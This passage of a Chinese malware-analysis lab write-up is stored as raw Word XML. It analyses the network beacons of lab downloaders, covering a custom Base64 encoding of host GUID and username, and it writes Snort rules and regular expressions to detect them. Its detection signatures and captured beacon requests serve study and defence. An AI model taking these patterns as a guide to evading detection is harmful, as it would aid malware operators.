                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>/\/[A-Z</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>-9a-z+\/]{24,}\([A-Z0-9a-z+\/]</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>\</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>\</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>/\1.png/</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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应用与前面表达式相同的快捷方式，显示如下：</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rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>/\/</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体" w:cs="Consolas"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>Ω</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>{24,}\(</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体" w:cs="Consolas"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>Ω</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>\</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>\</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>/\1.png/</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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表达式中的\1是指括号之间捕获的第一个元素，它是正斜线(/)之前的Base64编码字符串中的第一个字符。</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现在，有了两个正则表达式，它们可以识别恶意代码产生的模式。将它们转化为Snort特征规则，当恶意代码在网络上产生流量时用它来检测。第一个特征如下：</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rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">alert tcp </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>$</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">HOME_NET any-&gt; </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>$</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">EXTERNAL_NET </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>$</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>HTTP_PORTS(msg:"PM14.1.1 Colons and</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>dash"; urilen:&gt;32; content:"GET|20|</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>;depth:5; pcre:"/GET\x20\/[A-Z0-9a-z</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>\/</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>]{3}6[A-Z0-9a-z+\/]{3}6[A-Z0-9a-z+\/]{3}6[A-Z0-9a-z+\/]{3}6[A-Z0-9a-z+\/]{3}6[A-Z0-9a-z+\/]{3}t([A-Z</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>-9a-z+\/]{4}){1,}\//";sid:20001411; rev:1;)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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这个Snort规则仅包含数据包开头的GET/的内容字符串，但是它通常用一个更独特的内容字符串来改进包处理。关键字urilen确保URI具有固定长度——本例中，大于32个字符(考虑第一条路径段外的额外字符)。</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对于第二个特征，编写的Snort规则如下：</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rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">alert tcp </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>$</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">HOME_NET any -&gt; </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>$</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">EXTERNAL_NET </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>$</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>HTTP_PORTS (msg:"PM14.1.2 Base64 and</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>png"; urilen:&gt;32; uricontent:".png";pcre:"/\[A-Z</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>-9a-</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>z</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>+\/]{24,}([A-Z</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>-9a-z+\/])\\1\.png/";sid:20001412; rev:1;)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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为了改进包处理性能，测试PCRE正则表达式之前，Snort规则在正则表达式中搜索了.png的内容。它也增加了对URI长度的检查，URI有一个已知的最小长度。</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除了前面的特征以外，也能用域名(www.practicalmalwareanalysis.com)、恶意代码下载可执行文件的事实等，作为检测目标。联合这些特征常常是有效的策略。例如，对于经常产生误报的恶意代码特征，如果与触发可执行文件下载的特征相结合，可能仍然有效。</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问题：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:pageBreakBefore w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:kinsoku/>
        <w:wordWrap/>
        <w:overflowPunct/>
        <w:topLinePunct w:val="0"/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:bidi w:val="0"/>
        <w:adjustRightInd/>
        <w:snapToGrid/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:leftChars="200" w:firstLine="960" w:firstLineChars="400"/>
        <w:jc w:val="left"/>
        <w:textAlignment w:val="auto"/>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分析恶意代码文件Lab14-01.exe。这个程序对你的系统无害。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="750" w:leftChars="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恶意代码使用了哪些网络库?它们的优势是什么?</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该程序中包含了URLDownloadToCacheFile函数，而这个函数使用了COM接口。当恶意代码使用COM接口时，HTTP请求中的大部分内容都来自Windows内部，因此无法有效地使用网络特征来进行针对性的检测。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="10"/>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用于构建网络信令的信息源元素是什么，什么样的条件会引起信令的改变?</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信息源元素是主机GUID与用户名的一部分。GUID对于任何主机操作系统都是唯一的，信令中使用了GUID中的6个字节，应该也是相对唯一的。用户名则会根据登录系统的用户而改变。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="10"/>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为什么攻击者可能对嵌入在网络信令中的信息感兴趣?</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攻击者可能想跟踪运行下载器的特定主机，以及针对特定的用户。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="10"/>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恶意代码是否使用了标准的Base64编码?如果不是，编码是如何不寻常的?</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不是标准的Base64编码，因为它在填充时，使用a代替等号(=)作为填充符号。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="10"/>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恶意代码的主要目的是什么?</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这个恶意代码下载并运行其他代码</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="10"/>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使用网络特征可能有效探测到恶意代码通信中的什么元素?</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恶意代码通信中可以作为检测目标的元素包括域名、冒号以及Base64解码后出现的破折号，以及URI的Base64编码最后一个字符是作为PNG文件名单字符的事实。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="10"/>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分析者尝试为这个恶意代码开发一个特征时，可能会犯什么错误?</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防御者如果没有意识到操作系统决定着这些元素，则他们可能会尝试将URI以为的元素作为目标。多数情况下，Base64编码字符串以a结尾，它通常使文件名显示为a.png。然而，如果用户名长度是3的倍数，那么最后一个字符和文件名都取决于编码用户名的最后一个字符。这种情况下，文件名是不可预测的。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="10"/>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哪些特征集可能检测到这个恶意代码(以及新的变种)?</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推荐的特征集请参考详细分析过程。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>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Lab14-2</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对恶意代码执行动态分析。恶意代码第一次发送一个带有奇怪User-Agent字符串的信令：</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sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>GET /tenfour.html HTTP/1.1</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User-Agent:(</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>!</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>&lt;e6LJC+xnBq90daDNB+1TDrhG6a</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>W</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>G6p9LC/iNBqsGi2sVg</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>J</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>dqhZXDZoMMomKGoqxUE73N9qH</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>dZ</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>l</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>tj</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>Z</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>4RhJ</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>W</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Uh2XiA6imBriT9/oGoqxmCYsiYGofonNC1bxJD6pLB/1ndbaS9YXe9710A6t/CpVpCq5m7</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>l1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>LCqR</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Br</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>W</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>y</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Host:127.0.0.1</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Cache-Control:no-cache</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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片刻之后它发出了第二个信令：</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sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>GET /tenfour.html HTTP/1.1</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User-Agent:Internet Surf</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Host:127.0.0.1</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Cache-Control:no-cache</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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在多次动态实验中信令内容并没有产生变化，但是更改主机或者用户将会改变最初编码信令的内容，这就提供了一个线索：即用于编码信令的信息来源依赖于特定主机的信息。</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查看导入表</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从网络函数开始，看到从WinINet库中导入了函数InternetOpenA、InternetopenUr1A、InternetReadFile和InternetCloseHandle。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:widowControl/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420" w:firstLineChars="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3446145" cy="3170555"/>
            <wp:effectExtent l="0" t="0" r="0" b="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0"/>
                    <a:srcRect b="2935"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3446145" cy="3170555"/>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default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3417570" cy="2371725"/>
            <wp:effectExtent l="0" t="0" r="11430" b="571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1"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3417570" cy="237172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InternetopenUrlA的一个参数是常量0x80000000。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:widowControl/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420" w:firstLineChars="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3095625" cy="1263650"/>
            <wp:effectExtent l="0" t="0" r="13335" b="127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2"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
